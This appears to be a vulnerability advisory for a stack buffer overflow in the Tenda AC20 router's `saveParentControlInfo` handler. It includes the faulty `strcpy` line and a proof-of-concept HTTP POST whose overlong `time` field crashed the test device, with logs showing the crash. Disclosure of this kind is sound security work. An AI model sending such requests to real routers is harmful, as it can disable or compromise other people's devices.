### Key Information #### Product Information - **Vendor**: Shenzhen Tenda Technology Co., Ltd. - **Affected Product**: AC20 - **Affected Firmware Versions**: <= V16.03.08.12 (latest) - **Firmware Download URL**: tenda.com.cn/material/show/3264 #### Vulnerability Overview - **Vulnerability Type**: Buffer Overflow - **Trigger Method**: An attacker sends a crafted HTTP POST request to the `/goform/saveParentControlInfo` endpoint, triggering a denial-of-service or remote code execution via the `strcpy(s + 2, var)` function. - **Cause**: The `var` parameter lacks boundary checking. #### Vulnerability Details - **Critical Function**: `saveParentControlInfo` - **Problematic Code**: ```c strcpy(s + 2, var); ``` - **Unchecked Fields**: `deviceName`, `time` #### POC (Proof of Concept) - **HTTP Request Example**: ```http POST /goform/saveParentControlInfo HTTP/1.1 Host: 192.168.102.146 Content-Length: 95 ... deviceName=123&time=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa... ``` #### Error Messages - **Burp Suite Professional**: - Connection failed: Failed to connect to 192.168.102.146:80 - **Error Logs**: - Device name setting failed: [cgi:set_device_name:1758] device name setted failed! ``` This information indicates that the AC20 router contains a severe buffer overflow vulnerability, potentially leading to denial-of-service or remote code execution. Attackers can trigger this vulnerability by sending specific HTTP POST requests.